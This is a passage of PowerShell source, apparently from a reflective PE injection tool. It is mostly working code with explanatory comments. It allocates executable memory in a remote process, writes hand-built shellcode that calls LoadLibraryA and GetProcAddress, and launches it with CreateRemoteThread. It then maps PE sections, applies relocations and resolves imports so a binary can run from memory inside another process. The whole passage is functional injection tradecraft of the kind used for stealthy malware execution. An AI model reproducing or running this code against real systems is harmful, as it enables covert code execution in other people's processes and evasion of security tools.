($LoadLibrarySC1.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)\n\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\t\tWrite-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem\n\t\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)\n\n\t\t\t\n\t\t\t$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\t\tif ($RSCAddr -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Unable to allocate memory in the remote process for shellcode\"\n\t\t\t}\n\t\t\t\n\t\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\t\tif (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t\t{\n\t\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t\t}\n\t\t\t\n\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\tif ($Result -ne 0)\n\t\t\t{\n\t\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t}\n\t\t\t\n\t\t\t#The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory\n\t\t\t[IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t\t$Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n\t\t\tif ($Result -eq $false)\n\t\t\t{\n\t\t\t\tThrow \"Call to ReadProcessMemory failed\"\n\t\t\t}\n\t\t\t[IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])\n\n\t\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t}\n\t\telse\n\t\t{\n\t\t\t[IntPtr]$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions\n\t\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\t\tif ($Result -ne 0)\n\t\t\t{\n\t\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t\t}\n\t\t\t\n\t\t\t[Int32]$ExitCode = 0\n\t\t\t$Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)\n\t\t\tif (($Result -eq 0) -or ($ExitCode -eq 0))\n\t\t\t{\n\t\t\t\tThrow \"Call to GetExitCodeThread failed\"\n\t\t\t}\n\t\t\t\n\t\t\t[IntPtr]$DllAddress = [IntPtr]$ExitCode\n\t\t}\n\t\t\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\n\t\treturn $DllAddress\n\t}\n\t\n\t\n\tFunction Get-RemoteProcAddress\n\t{\n\t\tParam(\n\t\t[Parameter(Position=0, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle,\n\t\t\n\t\t[Parameter(Position=1, Mandatory=$true)]\n\t\t[IntPtr]\n\t\t$RemoteDllHandle,\n\t\t\n\t\t[Parameter(Position=2, Mandatory=$true)]\n\t\t[String]\n\t\t$FunctionName\n\t\t)\n\n\t\t$PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\t\t$FunctionNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($FunctionName)\n\t\t\n\t\t#Write FunctionName to memory (will be used in GetProcAddress)\n\t\t$FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)\n\t\t$RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\tif ($RFuncNamePtr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process\"\n\t\t}\n\n\t\t[UIntPtr]$NumBytesWritten = [UIntPtr]::Zero\n\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)\n\t\t[System.Runtime.InteropServices.Marshal]::FreeHGlobal($FunctionNamePtr)\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tThrow \"Unable to write DLL path to remote process memory\"\n\t\t}\n\t\tif ($FunctionNameSize -ne $NumBytesWritten)\n\t\t{\n\t\t\tThrow \"Didn't write the expected amount of bytes when writing a DLL path to load to the remote process\"\n\t\t}\n\t\t\n\t\t#Get address of GetProcAddress\n\t\t$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n\t\t$GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"GetProcAddress\") #Kernel32 loaded to the same address for all processes\n\n\t\t\n\t\t#Allocate memory for the address returned by GetProcAddress\n\t\t$GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\t\tif ($GetProcAddressRetMem -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process for the return value of GetProcAddress\"\n\t\t}\n\t\t\n\t\t\n\t\t#Write Shellcode to the remote process which will call GetProcAddress\n\t\t#Shellcode: GetProcAddress.asm\n\t\t#todo: need to have detection for when to get by ordinal\n\t\t[Byte[]]$GetProcAddressSC = @()\n\t\tif ($PEInfo.PE64Bit -eq $true)\n\t\t{\n\t\t\t$GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)\n\t\t\t$GetProcAddressSC2 = @(0x48, 0xba)\n\t\t\t$GetProcAddressSC3 = @(0x48, 0xb8)\n\t\t\t$GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9)\n\t\t\t$GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8)\n\t\t\t$GetProcAddressSC2 = @(0xb9)\n\t\t\t$GetProcAddressSC3 = @(0x51, 0x50, 0xb8)\n\t\t\t$GetProcAddressSC4 = @(0xff, 0xd0, 0xb9)\n\t\t\t$GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3)\n\t\t}\n\t\t$SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4)\n\t\t$SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n\t\t$SCPSMemOriginal = $SCPSMem\n\t\t\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length)\n\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false)\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n\t\tWrite-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem\n\t\t$SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length)\n\t\t\n\t\t$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n\t\tif ($RSCAddr -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to allocate memory in the remote process for shellcode\"\n\t\t}\n\t\t\n\t\t$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n\t\tif (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n\t\t{\n\t\t\tThrow \"Unable to write shellcode to remote process memory.\"\n\t\t}\n\t\t\n\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n\t\t$Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n\t\tif ($Result -ne 0)\n\t\t{\n\t\t\tThrow \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n\t\t}\n\t\t\n\t\t#The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory\n\t\t[IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n\t\t$Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)\n\t\tif (($Result -eq $false) -or ($NumBytesWritten -eq 0))\n\t\t{\n\t\t\tThrow \"Call to ReadProcessMemory failed\"\n\t\t}\n\t\t[IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])\n\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t$Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n\t\t\n\t\treturn $ProcAddress\n\t}\n\n\n\tFunction Copy-Sections\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[Byte[]]\n\t\t$PEBytes,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\tfor( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n\t\t{\n\t\t\t[IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n\t\t\t$SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)\n\t\t\n\t\t\t#Address to copy the section to\n\t\t\t[IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress))\n\t\t\t\n\t\t\t#SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated\n\t\t\t#    in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If\n\t\t\t#    SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away,\n\t\t\t#    so truncate SizeOfRawData to VirtualSize\n\t\t\t$SizeOfRawData = $SectionHeader.SizeOfRawData\n\n\t\t\tif ($SectionHeader.PointerToRawData -eq 0)\n\t\t\t{\n\t\t\t\t$SizeOfRawData = 0\n\t\t\t}\n\t\t\t\n\t\t\tif ($SizeOfRawData -gt $SectionHeader.VirtualSize)\n\t\t\t{\n\t\t\t\t$SizeOfRawData = $SectionHeader.VirtualSize\n\t\t\t}\n\t\t\t\n\t\t\tif ($SizeOfRawData -gt 0)\n\t\t\t{\n\t\t\t\tTest-MemoryRangeValid -DebugString \"Copy-Sections::MarshalCopy\" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null\n\t\t\t\t[System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData)\n\t\t\t}\n\t\t\n\t\t\t#If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space\n\t\t\tif ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize)\n\t\t\t{\n\t\t\t\t$Difference = $SectionHeader.VirtualSize - $SizeOfRawData\n\t\t\t\t[IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData))\n\t\t\t\tTest-MemoryRangeValid -DebugString \"Copy-Sections::Memset\" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null\n\t\t\t\t$Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null\n\t\t\t}\n\t\t}\n\t}\n\n\n\tFunction Update-MemoryAddresses\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[Int64]\n\t\t$OriginalImageBase,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types\n\t\t)\n\t\t\n\t\t[Int64]$BaseDifference = 0\n\t\t$AddDifference = $true #Track if the difference variable should be added or subtracted from variables\n\t\t[UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\t\t\n\t\t#If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do\n\t\tif (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `\n\t\t\t\t-or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))\n\t\t{\n\t\t\treturn\n\t\t}\n\n\n\t\telseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)\n\t\t{\n\t\t\t$BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)\n\t\t\t$AddDifference = $false\n\t\t}\n\t\telseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)\n\t\t{\n\t\t\t$BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)\n\t\t}\n\t\t\n\t\t#Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified\n\t\t[IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))\n\t\twhile($true)\n\t\t{\n\t\t\t#If SizeOfBlock == 0, we are done\n\t\t\t$BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\n\t\t\tif ($BaseRelocationTable.SizeOfBlock -eq 0)\n\t\t\t{\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\t[IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))\n\t\t\t$NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2\n\n\t\t\t#Loop through each relocation\n\t\t\tfor($i = 0; $i -lt $NumRelocations; $i++)\n\t\t\t{\n\t\t\t\t#Get info for this relocation\n\t\t\t\t$RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))\n\t\t\t\t[UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])\n\n\t\t\t\t#First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase\n\t\t\t\t[UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF\n\t\t\t\t[UInt16]$RelocType = $RelocationInfo -band 0xF000\n\t\t\t\tfor ($j = 0; $j -lt 12; $j++)\n\t\t\t\t{\n\t\t\t\t\t$RelocType = [Math]::Floor($RelocType / 2)\n\t\t\t\t}\n\n\t\t\t\t#For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit.\n\t\t\t\t#This appears to be true for EXE's as well.\n\t\t\t\t#\tSite: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx\n\t\t\t\tif (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `\n\t\t\t\t\t\t-or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))\n\t\t\t\t{\t\t\t\n\t\t\t\t\t#Get the current memory address and update it based off the difference between PE expected base address and actual base address\n\t\t\t\t\t[IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))\n\t\t\t\t\t[IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])\n\t\t\n\t\t\t\t\tif ($AddDifference -eq $true)\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n\t\t\t\t\t}\t\t\t\t\n\n\t\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null\n\t\t\t\t}\n\t\t\t\telseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)\n\t\t\t\t{\n\t\t\t\t\t#IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it\n\t\t\t\t\tThrow \"Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo\"\n\t\t\t\t}\n\t\t\t}\n\t\t\t\n\t\t\t$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))\n\t\t}\n\t}\n\n\n\tFunction Import-DllImports\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$PEInfo,\n\t\t\n\t\t[Parameter(Position = 1, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Functions,\n\t\t\n\t\t[Parameter(Position = 2, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Types,\n\t\t\n\t\t[Parameter(Position = 3, Mandatory = $true)]\n\t\t[System.Object]\n\t\t$Win32Constants,\n\t\t\n\t\t[Parameter(Position = 4, Mandatory = $false)]\n\t\t[IntPtr]\n\t\t$RemoteProcHandle\n\t\t)\n\t\t\n\t\t$RemoteLoading = $false\n\t\tif ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)\n\t\t{\n\t\t\t$RemoteLoading = $true\n\t\t}\n\t\t\n\t\tif ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n\t\t{\n\t\t\t[IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\t\t\t\n\t\t\twhile ($true)\n\t\t\t{\n\t\t\t\t$ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\t\t\t\t\n\t\t\t\t#If the structure is null, it signals that this is the end of the array\n\t\t\t\tif ($ImportDescriptor.Characteristics -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.FirstThunk -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.ForwarderChain -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.Name -eq 0 `\n\t\t\t\t\t\t-and $ImportDescriptor.TimeDateStamp -eq 0)\n\t\t\t\t{\n\t\t\t\t\tWrite-Verbose \"Done importing DLL imports\"\n\t\t\t\t\tbreak\n\t\t\t\t}\n\n\t\t\t\t$ImportDllHandle = [IntPtr]::Zero\n\t\t\t\t$ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))\n\t\t\t\t$ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n\t\t\t\t\n\t\t\t\tif ($RemoteLoading -eq $true)\n\t\t\t\t{\n\t\t\t\t\t$ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\t$ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)\n\t\t\t\t}\n\n\t\t\t\tif (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))\n\t\t\t\t{\n\t\t\t\t\tthrow \"Error importing DLL, DLLName: $ImportDllPath\"\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t#Get the first thunk, then loop through all of them\n\t\t\t\t[IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)\n\t\t\t\t[IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk\n\t\t\t\t[IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\t\t\t\t\n\t\t\t\twhile ($OriginalThunkRefVal -ne [IntPtr]::Zero)\n\t\t\t\t{\n\t\t\t\t\t$ProcedureName = ''\n\t\t\t\t\t#Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit\n\t\t\t\t\t#\tIf the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint\n\t\t\t\t\t#\tand doing the comparison, just see if it is less than 0\n\t\t\t\t\t[IntPtr]$NewThunkRef = [IntPtr]::Zero\n\t\t\t\t\tif([Int64]$OriginalThunkRefVal -lt 0)\n\t\t\t\t\t{\n\t\t\t\t\t\t$ProcedureName = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)\n\t\t\t\t\t\t$StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))\n\t\t\t\t\t\t$ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tif ($RemoteLoading -eq $true)\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionName $ProcedureName\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\t[IntPtr]$NewThunkRef = $Win32Functions.GetProcAddress.Invoke($ImportDllHandle, $ProcedureName)\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tif ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)\n\t\t\t\t\t{\n\t\t\t\t\t\tThrow \"New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath\"\n\t\t\t\t\t}\n\n\t\t\t\t\t[System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)\n\t\t\t\t\t\n\t\t\t\t\t$ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n\t\t\t\t\t[IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n\t\t\t\t\t[IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t}\n\t\t}\n\t}\n\n\tFunction Get-VirtualProtectValue\n\t{\n\t\tParam(\n\t\t[Parameter(Position = 0, Mandatory = $true)]\n\t\t[UInt32]\n\t\t$SectionCharacteristics\n\t\t)\n\t\t\n\t\t$ProtectionFlag = 0x0\n\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)\n\t\t{\n\t\t\tif (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n\t\t\t{\n\t\t\t\tif (($SectionCharacteristics -band 